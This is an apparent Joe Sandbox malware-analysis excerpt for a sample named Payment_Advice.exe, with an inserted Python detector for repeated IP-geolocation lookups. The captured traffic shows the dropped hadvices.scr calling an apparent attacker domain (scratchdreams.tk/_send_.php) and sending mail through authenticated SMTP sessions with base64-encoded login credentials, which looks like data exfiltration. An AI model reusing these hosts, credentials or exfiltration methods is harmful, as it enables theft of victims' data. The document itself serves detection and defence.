Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49735 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:32 UTC | 85 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-05-01 13:17:33 UTC | 698 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:33 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 0
                                                    Last-Modified: Wed, 01 May 2024 13:17:33 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6UNSa0du88oS3FOQw1bNspGbKXUKpjtHJlSB0U2Br4RHZKy9TLSmDkOVHbKKncamOXoHitM3AV1saKTLoGBvkl7Ya3lynyLbJEwKpqZJ96z5t7yqnA5ngkjFRxRaWfwaIK9%2Bm23"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d679df428a4-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:33 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49737 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:34 UTC | 85 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-05-01 13:17:34 UTC | 710 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:34 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 7
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FJHdLfoHwRXKi7%2F9BYIpJJvbMUutRU%2BqQrfEcrBsCqqp%2FQ%2F18uODgyZTGaI1GzmqkDC3%2B5j9sYgJxKCnQzuDysGopFHyO6wc1j7hEnNuIw2LOrsTrEX%2B%2BE5V8lqF9HNjXf2ar20"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d728d5a5a8d-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:34 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0
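
Analyst note, added here and not part of the Joe Sandbox output: the sessions above are all the dropped C:\Windows\Temp\hadvices.scr (PID 8336) fetching GET /xml/149.18.24.96 from reallyfreegeoip.org once every second or two, while the only other HTTPS client in the capture, AcroCEF.exe, makes a single request to armmf.adobe.com. A public IP-geolocation lookup repeated by a screensaver-extension binary in a temp directory is the kind of pattern a detection engineer would turn into a rule. The Python below is an example detector, not code from the report or from the malware: it runs over session records constructed from the values shown above (PID, image path, request timestamp, request text), parses the request line and Host header, flags the temp-directory/.scr image, and raises one alert when a single PID polls a geolocation host at least three times inside a 60-second window. The 60-second window, the three-hit threshold, the temp-directory list and the extension list are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Public IP / geolocation lookup services. Only the host observed in this
# report is listed; a production rule would carry a longer watchlist.
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# Assumed for the example: writable drop directories and disguise extensions.
TEMP_DIRS = ("c:\\windows\\temp\\", "\\appdata\\local\\temp\\")
DISGUISE_EXT = {".scr", ".pif"}

REQ_LINE = re.compile(r"^(GET|POST|HEAD|PUT)\s+(\S+)\s+HTTP/1\.[01]$")
HOST_HDR = re.compile(r"^Host:\s*(\S+)$", re.IGNORECASE)
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Constructed session records: PID, image, first-request timestamp and the
# request text, taken from the sessions shown above (one record per TCP session).
GEOIP_REQ = ("GET /xml/149.18.24.96 HTTP/1.1\r\n"
             "Host: reallyfreegeoip.org\r\n"
             "Connection: Keep-Alive\r\n")
SESSIONS = [
    {"session": 2, "pid": 7348,
     "image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe",
     "ts": "2024-05-01 13:17:21",
     "request": ("GET /onboarding/smskillreader.txt HTTP/1.1\r\n"
                 "Host: armmf.adobe.com\r\n"
                 "Connection: keep-alive\r\n")},
] + [
    {"session": s, "pid": 8336, "image": r"C:\Windows\Temp\hadvices.scr",
     "ts": "2024-05-01 " + t, "request": GEOIP_REQ}
    for s, t in [(3, "13:17:27"), (4, "13:17:28"), (5, "13:17:30"), (6, "13:17:31"),
                 (7, "13:17:31"), (8, "13:17:32"), (9, "13:17:34"), (10, "13:17:34")]
]


def parse_request(raw):
    """Return (method, path, host) for an HTTP/1.x request, or None if the text is not one."""
    lines = raw.replace("\r\n", "\n").split("\n")
    m = REQ_LINE.match(lines[0].strip())
    if not m:
        return None
    host = None
    for line in lines[1:]:
        h = HOST_HDR.match(line.strip())
        if h:
            host = h.group(1).lower()
            break
    return m.group(1), m.group(2), host


def suspicious_image(image):
    """True when the process image sits in a temp directory under a disguise extension."""
    low = image.lower()
    return any(d in low for d in TEMP_DIRS) and PureWindowsPath(low).suffix in DISGUISE_EXT


def detect(sessions, min_hits=3, window=timedelta(seconds=60)):
    """One alert per (PID, host) that issues >= min_hits geolocation lookups inside `window`."""
    buckets = defaultdict(list)  # (pid, image, host, looked-up IP) -> request timestamps
    for s in sessions:
        parsed = parse_request(s["request"])
        if parsed is None or parsed[2] not in GEOIP_HOSTS:
            continue
        _, path, host = parsed
        tail = path.rstrip("/").rsplit("/", 1)[-1]
        target_ip = tail if IPV4.match(tail) else None  # the IP the caller asks about
        ts = datetime.strptime(s["ts"], "%Y-%m-%d %H:%M:%S")
        buckets[(s["pid"], s["image"], host, target_ip)].append(ts)

    alerts = []
    for (pid, image, host, target_ip), stamps in buckets.items():
        stamps.sort()
        # Two-pointer sweep: size of the densest run of lookups that fits in the window.
        best, j = 0, 0
        for i, start in enumerate(stamps):
            while j < len(stamps) and stamps[j] - start <= window:
                j += 1
            best = max(best, j - i)
        if best >= min_hits:
            alerts.append({
                "pid": pid, "image": image, "image_suspicious": suspicious_image(image),
                "host": host, "target_ip": target_ip, "hits": len(stamps),
                "burst": best, "first": stamps[0].isoformat(), "last": stamps[-1].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SESSIONS):
        print(alert)
```

Run against the constructed records, the detector returns a single alert for PID 8336 with eight lookups of 149.18.24.96 in a seven-second burst and image_suspicious set, and nothing for the AcroCEF.exe session; the threshold keeps a legitimate application that performs one geolocation lookup from firing.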


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49739 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:34 UTC | 85 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-05-01 13:17:35 UTC | 693 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:35 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:35 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eth4Glb1qHOXFUx7rcJRXgtiRcLmcDjjcV%2FQT%2Bw2Pwy9Uwkaz3qphIA6yEIO3AUAl5iueyi9XWymjlMSESW3HFCWVU8cHImOZ4BM2od1Xug46F2b2GKcVYVpQtgM2mVIUJZXXEn9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d76ac34827b-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:35 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.7 | 49740 | 172.67.169.18 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-05-01 13:17:36 UTC | 79 | OUT | GET /_send_.php?TS HTTP/1.1
                                                    Host: scratchdreams.tk
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:18:15 UTC | 735 | IN | HTTP/1.1 522
                                                    Date: Wed, 01 May 2024 13:18:15 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 15
                                                    Connection: close
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWcfuWbC8wEyKzm4iTvfa3ldmabudxUgvvHNDA99d7YDJp%2FsfoEdkVWNREmYn%2B9WuucXJNR%2FbkyvTHJw9PA2O5GNHZW2c82AyQdmcvUsUlFT3RaJqZAIr087q0sS5Zu7481k"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    X-Frame-Options: SAMEORIGIN
                                                    Referrer-Policy: same-origin
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d7e1e969c66-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:18:15 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                    Data Ascii: error code: 522


                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                    May 1, 2024 15:18:22.234245062 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:22 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:22.237030983 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | EHLO 124406
                                                    May 1, 2024 15:18:22.422550917 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:22.423414946 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:22.608987093 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:22.815016031 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 235 Authentication succeeded
                                                    May 1, 2024 15:18:22.816876888 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:23.002016068 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 250 OK
                                                    May 1, 2024 15:18:23.005209923 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:23.209431887 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 250 Accepted
                                                    May 1, 2024 15:18:23.212903023 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | DATA
                                                    May 1, 2024 15:18:23.398072958 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:23.398718119 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | .
                                                    May 1, 2024 15:18:23.584955931 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 250 OK id=1s29qp-002MZW-0y
                                                    May 1, 2024 15:18:32.787504911 CEST | 49743 | 587 | 192.168.2.7 | 108.167.142.65 | QUIT
                                                    May 1, 2024 15:18:33.174777985 CEST | 587 | 49743 | 108.167.142.65 | 192.168.2.7 | 221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:33.596746922 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:33 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:33.597153902 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | EHLO 124406
                                                    May 1, 2024 15:18:33.782171965 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:33.783207893 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:33.969841003 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:34.156584024 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 235 Authentication succeeded
                                                    May 1, 2024 15:18:34.156830072 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:34.341757059 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 250 OK
                                                    May 1, 2024 15:18:34.341912985 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:34.536429882 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 250 Accepted
                                                    May 1, 2024 15:18:34.536693096 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | DATA
                                                    May 1, 2024 15:18:34.721483946 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:34.721896887 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | .
                                                    May 1, 2024 15:18:34.910490036 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 250 OK id=1s29r0-002Mkk-21
                                                    May 1, 2024 15:18:34.910955906 CEST | 49744 | 587 | 192.168.2.7 | 108.167.142.65 | QUIT
                                                    May 1, 2024 15:18:35.297065973 CEST | 587 | 49744 | 108.167.142.65 | 192.168.2.7 | 221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:35.734958887 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:35 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:35.735127926 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | EHLO 124406
                                                    May 1, 2024 15:18:35.919647932 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:35.919945002 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:36.104454041 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:36.294116974 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 235 Authentication succeeded
                                                    May 1, 2024 15:18:36.294261932 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:36.480974913 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 250 OK
                                                    May 1, 2024 15:18:36.483011007 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:36.679652929 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 250 Accepted
                                                    May 1, 2024 15:18:36.679847956 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | DATA
                                                    May 1, 2024 15:18:36.864588976 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:36.865027905 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | .
                                                    May 1, 2024 15:18:37.050724030 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 250 OK id=1s29r2-002MmM-2U
                                                    May 1, 2024 15:18:37.051245928 CEST | 49745 | 587 | 192.168.2.7 | 108.167.142.65 | QUIT
                                                    May 1, 2024 15:18:37.438815117 CEST | 587 | 49745 | 108.167.142.65 | 192.168.2.7 | 221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:37.881153107 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:37 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:37.881314039 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | EHLO 124406
                                                    May 1, 2024 15:18:38.066452026 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:38.066719055 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:38.257388115 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:38.443741083 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 235 Authentication succeeded
                                                    May 1, 2024 15:18:38.443901062 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:38.628559113 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 250 OK
                                                    May 1, 2024 15:18:38.628998995 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:38.824045897 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 250 Accepted
                                                    May 1, 2024 15:18:38.824176073 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | DATA
                                                    May 1, 2024 15:18:39.012978077 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:39.013290882 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | .
                                                    May 1, 2024 15:18:39.199729919 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 250 OK id=1s29r4-002MnQ-2x
                                                    May 1, 2024 15:18:39.203257084 CEST | 49746 | 587 | 192.168.2.7 | 108.167.142.65 | QUIT
                                                    May 1, 2024 15:18:39.590287924 CEST | 587 | 49746 | 108.167.142.65 | 192.168.2.7 | 221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:39.994204998 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:39 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:39.994446993 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | EHLO 124406
                                                    May 1, 2024 15:18:40.180181980 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:40.180356026 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:40.366153955 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:40.556767941 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 235 Authentication succeeded
                                                    May 1, 2024 15:18:40.557101965 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:40.741717100 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 250 OK
                                                    May 1, 2024 15:18:40.741892099 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:40.938692093 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 250 Accepted
                                                    May 1, 2024 15:18:40.941020966 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | DATA
                                                    May 1, 2024 15:18:41.125916004 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:41.126355886 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | .
                                                    May 1, 2024 15:18:41.312248945 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 250 OK id=1s29r7-002MpA-06
                                                    May 1, 2024 15:18:41.312752962 CEST | 49747 | 587 | 192.168.2.7 | 108.167.142.65 | QUIT
                                                    May 1, 2024 15:18:41.698955059 CEST | 587 | 49747 | 108.167.142.65 | 192.168.2.7 | 221 gator4175.hostgator.com closing connection


                                                    Target ID:0
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Payment_Advice.exe"
                                                    Imagebase:0xc30000
                                                    File size:957'952 bytes
                                                    MD5 hash:E708AA3160E224DE971421D5BC2FEE29
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Payment_Advice.exe"
                                                    Imagebase:0xe50000
                                                    File size:957'952 bytes
                                                    MD5 hash:E708AA3160E224DE971421D5BC2FEE29
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
